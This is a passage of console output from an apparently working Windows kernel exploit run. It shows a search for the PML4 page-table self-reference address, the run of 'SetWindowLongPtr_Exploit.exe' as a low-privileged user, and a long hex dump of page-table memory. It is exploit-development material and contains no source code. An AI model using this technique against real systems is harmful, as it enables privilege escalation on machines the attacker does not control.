in Potential Array: ffffc6e371b8dc68\r\nLeft in Potential Array: ffffc763b1d8ec70\r\nLeft in Potential Array: ffffc7e3f1f8fc78\r\nLeft in Potential Array: ffffc86432190c80\r\nLeft in Potential Array: ffffc8e472391c88\r\nLeft in Potential Array: ffffc964b2592c90\r\nLeft in Potential Array: ffffc9e4f2793c98\r\nLeft in Potential Array: ffffca6532994ca0\r\nLeft in Potential Array: ffffcae572b95ca8\r\nLeft in Potential Array: ffffcb65b2d96cb0\r\nLeft in Potential Array: ffffcbe5f2f97cb8\r\nLeft in Potential Array: ffffcc6633198cc0\r\nLeft in Potential Array: ffffcce673399cc8\r\nLeft in Potential Array: ffffcd66b359acd0\r\nLeft in Potential Array: ffffcde6f379bcd8\r\nLeft in Potential Array: ffffce673399cce0\r\nLeft in Potential Array: ffffcee773b9dce8\r\nLeft in Potential Array: ffffcf67b3d9ecf0\r\nLeft in Potential Array: ffffcfe7f3f9fcf8\r\nLeft in Potential Array: ffffd068341a0d00\r\nLeft in Potential Array: ffffd0e8743a1d08\r\nLeft in Potential Array: ffffd168b45a2d10\r\nLeft in Potential Array: ffffd1e8f47a3d18\r\nLeft in Potential Array: ffffd269349a4d20\r\nLeft in Potential Array: ffffd2e974ba5d28\r\nLeft in Potential Array: ffffd369b4da6d30\r\nLeft in Potential Array: ffffd3e9f4fa7d38\r\nLeft in Potential Array: ffffd46a351a8d40\r\nLeft in Potential Array: ffffd4ea753a9d48\r\nLeft in Potential Array: ffffd56ab55aad50\r\nLeft in Potential Array: ffffd5eaf57abd58\r\nLeft in Potential Array: ffffd66b359acd60\r\nLeft in Potential Array: ffffd6eb75badd68\r\nLeft in Potential Array: ffffd76bb5daed70\r\nLeft in Potential Array: ffffd7ebf5fafd78\r\nLeft in Potential Array: ffffd86c361b0d80\r\nLeft in Potential Array: ffffd8ec763b1d88\r\nLeft in Potential Array: ffffd96cb65b2d90\r\nLeft in Potential Array: ffffd9ecf67b3d98\r\nLeft in Potential Array: ffffda6d369b4da0\r\nLeft in Potential Array: ffffdaed76bb5da8\r\nLeft in Potential Array: ffffdb6db6db6db0\r\nLeft in Potential Array: ffffdbedf6fb7db8\r\nLeft in Potential Array: ffffdc6e371b8dc0\r\nLeft in Potential Array: ffffdcee773b9dc8\r\nLeft in Potential Array: ffffdd6eb75badd0\r\nLeft in Potential Array: ffffddeef77bbdd8\r\nLeft in Potential Array: ffffde6f379bcde0\r\nLeft in Potential Array: ffffdeef77bbdde8\r\nLeft in Potential Array: ffffdf6fb7dbedf0\r\nLeft in Potential Array: ffffdfeff7fbfdf8\r\nLeft in Potential Array: ffffe070381c0e00\r\nLeft in Potential Array: ffffe0f0783c1e08\r\nLeft in Potential Array: ffffe170b85c2e10\r\nLeft in Potential Array: ffffe1f0f87c3e18\r\nLeft in Potential Array: ffffe271389c4e20\r\nLeft in Potential Array: ffffe2f178bc5e28\r\nLeft in Potential Array: ffffe371b8dc6e30\r\nLeft in Potential Array: ffffe3f1f8fc7e38\r\nLeft in Potential Array: ffffe472391c8e40\r\nLeft in Potential Array: ffffe4f2793c9e48\r\nLeft in Potential Array: ffffe572b95cae50\r\nLeft in Potential Array: ffffe5f2f97cbe58\r\nLeft in Potential Array: ffffe673399cce60\r\nLeft in Potential Array: ffffe6f379bcde68\r\nLeft in Potential Array: ffffe773b9dcee70\r\nLeft in Potential Array: ffffe7f3f9fcfe78\r\nLeft in Potential Array: ffffe8743a1d0e80\r\nLeft in Potential Array: ffffe8f47a3d1e88\r\nLeft in Potential Array: ffffe974ba5d2e90\r\nLeft in Potential Array: ffffe9f4fa7d3e98\r\nLeft in Potential Array: ffffea753a9d4ea0\r\nLeft in Potential Array: ffffeaf57abd5ea8\r\nLeft in Potential Array: ffffeb75badd6eb0\r\nLeft in Potential Array: ffffebf5fafd7eb8\r\nLeft in Potential Array: ffffec763b1d8ec0\r\nLeft in Potential Array: ffffecf67b3d9ec8\r\nLeft in Potential Array: ffffed76bb5daed0\r\nLeft in Potential Array: ffffedf6fb7dbed8\r\nLeft in Potential Array: ffffee773b9dcee0\r\nLeft in Potential Array: ffffeef77bbddee8\r\nLeft in Potential Array: ffffef77bbddeef0\r\nLeft in Potential Array: ffffeff7fbfdfef8\r\nLeft in Potential Array: fffff0783c1e0f00\r\nLeft in Potential Array: fffff0f87c3e1f08\r\nLeft in Potential Array: fffff178bc5e2f10\r\nLeft in Potential Array: fffff1f8fc7e3f18\r\nLeft in Potential Array: fffff2793c9e4f20\r\nLeft in Potential Array: fffff2f97cbe5f28\r\nLeft in Potential Array: fffff379bcde6f30\r\nLeft in Potential Array: fffff3f9fcfe7f38\r\nLeft in Potential Array: fffff47a3d1e8f40\r\nLeft in Potential Array: fffff4fa7d3e9f48\r\nLeft in Potential Array: fffff57abd5eaf50\r\nLeft in Potential Array: fffff5fafd7ebf58\r\nLeft in Potential Array: fffff6fb7dbedf68\r\nLeft in Potential Array: fffff77bbddeef70\r\nLeft in Potential Array: fffff7fbfdfeff78\r\nLeft in Potential Array: fffff87c3e1f0f80\r\nLeft in Potential Array: fffff8fc7e3f1f88\r\nLeft in Potential Array: fffff97cbe5f2f90\r\nLeft in Potential Array: fffff9fcfe7f3f98\r\nLeft in Potential Array: fffffa7d3e9f4fa0\r\nLeft in Potential Array: fffffafd7ebf5fa8\r\nLeft in Potential Array: fffffb7dbedf6fb0\r\nLeft in Potential Array: fffffbfdfeff7fb8\r\nLeft in Potential Array: fffffc7e3f1f8fc0\r\nLeft in Potential Array: fffffcfe7f3f9fc8\r\nLeft in Potential Array: fffffd7ebf5fafd0\r\nLeft in Potential Array: fffffdfeff7fbfd8\r\nLeft in Potential Array: fffffe7f3f9fcfe0\r\nLeft in Potential Array: fffffeff7fbfdfe8\r\nLeft in Potential Array: ffffff7fbfdfeff0\r\nLeft in Potential Array: fffffffffffffff8\r\nLeft in Final Array: fffff67b3d9ecf60\r\nResult: fffff67b3d9ecf60\r\nRun SetWindowLongPtr_Exploit.exe\r\nC:\\Users\\qa\\Desktop>SetWindowLongPtr_Exploit.exe fffff67b3d9ecf60\r\nMy PID is: 6056\r\nCurrent Username: qa\r\nPML4 Self Ref: FFFFF67B3D9ECF60\r\nEnter to continue...\r\n \r\n Value Self Ref = 8000000100211867\r\n000000003D9EC000 | 67 a8 e2 61 00 00 c0 02 67 d8 d8 6b 00 00 d0 00 | g..a....g..k....\r\n000000003D9EC010 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC020 | 67 68 81 08 01 00 90 01 00 00 00 00 00 00 00 00 | gh..............\r\n000000003D9EC030 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC040 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC050 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC060 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC070 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC080 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC090 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC100 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC110 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC120 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC130 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC140 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC150 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC160 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC170 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC180 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC190 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC200 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC210 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC220 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC230 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC240 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC250 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC260 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC270 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC280 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC290 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC300 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC310 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC320 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC330 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC340 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC350 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC360 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC370 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC380 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC390 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC400 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC410 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC420 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC430 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC440 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC450 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC460 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC470 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC480 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC490 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC500 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC510 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC520 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC530 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC540 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC550 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC560 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC570 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC580 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC590 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC600 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC610 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC620 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC630 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC640 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC650 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC660 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC670 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC680 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC690 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC700 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC710 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC720 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC730 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC740 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC750 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC760 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC770 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC780 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC790 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7F0 | 00 00 00 00 00 00 00 00 67 08 b9 4d 00 00 60 02 | ........g..M..`.\r\n000000003D9EC800 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC810 | 63 f8 ff 3f 01 00 00 00 63 38 88 00 00 00 00 80 | c..?....c8......\r\n000000003D9EC820 | 63 38 88 00 00 00 00 80 63 38 88 00 00 00 00 80 | c8......c8......\r\n000000003D9EC830 | 63 38 88 00 00 00 00 80 63 d8 ff 3f 01 00 00 00 | c8......c..?....\r\n000000003D9EC840 | 63 b8 ff 3f 01 00 00 00 00 00 00 00 00 00 00 00 | c..?............\r\n000000003D9EC850 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC860 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC870 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC880 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC890 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC8A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC8B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC8C0 | 63 a8 3f 0f 01 00 00 00 00 00 00 00 00 00 00 00 | c.?.............\r\n000000003D9EC8D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC8E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC8F0 | 00 00 00 00 00 00 00 00 63 18 35 02 00 00 00 00 | ........c.5.....\r\n000000003D9EC900 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC910 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC920 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC930 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC940 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC950 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC960 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC970 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC980 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC990 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA10 | 00 00 00 00 00 00 00 00 63 d8 47 00 00 00 00 00 | ........c.G.....\r\n000000003D9ECA20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB20 | 00 00 00 00 00 00 00 00 63 18 8b 00 00 00 00 00 | ........c.......\r\n000000003D9ECB30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC20 | 63 78 82 00 00 00 00 00 00 00 00 00 00 00 00 00 | cx..............\r\n000000003D9ECC30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC50 | 63 b8 57 00 00 00 00 00 00 00 00 00 00 00 00 00 | c.W.............\r\n000000003D9ECC60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD90 | 63 08 a9 30 01 00 00 00 63 68 c2 2a 00 00 00 00 | c..0....ch.*....\r\n000000003D9ECDA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECDB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECDC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECDD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECDE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECDF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE60 | 63 78 8b 00 00 00 00 00 00 00 00 00 00 